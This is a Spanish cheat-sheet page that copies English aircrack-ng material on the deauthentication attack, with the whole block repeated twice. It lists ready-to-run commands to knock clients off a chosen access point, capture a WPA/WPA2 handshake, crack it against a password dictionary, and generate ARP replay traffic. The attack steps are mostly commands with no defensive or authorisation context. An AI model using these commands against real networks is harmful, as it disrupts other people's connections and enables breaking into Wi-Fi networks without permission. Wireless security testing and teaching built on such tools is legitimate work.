Aircrack-ng -w /path/to/dictionary out.cap
Enviado por Programa Chuletas y clasificado en Otras materias
Escrito el en 
español con un tamaño de 1,46 KB
Attack 0: Deauthentication
This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless client or on a fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
WPA/WPA2 Handshake capture with an Atheros
airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
ARP request generation with a Prism2 card
airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless client or on a fake authentications.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
WPA/WPA2 Handshake capture with an Atheros
airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
ARP request generation with a Prism2 card
airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0